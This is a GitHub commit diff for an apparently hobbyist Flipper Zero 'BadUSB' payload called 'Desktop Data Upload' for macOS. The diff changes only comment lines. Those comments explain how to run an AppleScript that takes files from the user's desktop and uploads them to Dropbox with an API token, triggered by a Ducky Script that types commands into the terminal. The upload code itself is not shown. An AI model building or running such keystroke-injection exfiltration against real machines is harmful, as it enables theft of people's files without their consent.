Update Desktop Data Upload.txt cleaned up the code Runs with no prompts now!

This commit is contained in:
Narsty
2023-05-23 00:09:17 -05:00
committed by GitHub
parent 21c3e736ff
commit b3adb3d290
+4 -4
View File
@@ -4,9 +4,9 @@ REM Author: Narsty
REM Title: Desktop Data Upload REM Title: Desktop Data Upload
REM Version 1.0 MacOs REM Version 1.0 MacOs
REM Copy and paste this osascript/code into the Script editor App on your MacOs REM Copy and paste this osascript/code (lines 12-31) into the Script editor App on your MacOs
REM Replace the "Your API Access token Here" placeholder with your actual Dropbox API token. line 13 REM Replace the "Your API Access token Here" placeholder with your actual Dropbox API token. line 13
REM Save this script below as DTDUpload.scpt file (you can use Script Editor) to your desktop. REM Save this script below as DTDUpload.scpt file (Use Script Editor) to your desktop.
set desktopPath to POSIX path of (path to desktop folder) set desktopPath to POSIX path of (path to desktop folder)
@@ -34,8 +34,8 @@ end repeat
REM Title: Desktop Data Upload Execution Script REM Title: Desktop Data Upload Execution Script
REM Version 1.0 MacOs REM Version 1.0 MacOs
REM Save the below Ducky Script as a .txt file (main Read.me has step by step directions) REM Save the below Ducky Script as a .txt file lines 41-54 (main Read.me has step by step directions)
REM and put the .txt on your flipper zero to execute the osascript through the terminal. REM and put the .txt file on your BADUSB flipper zero APP to execute the osascript through the terminal.
DELAY 500 DELAY 500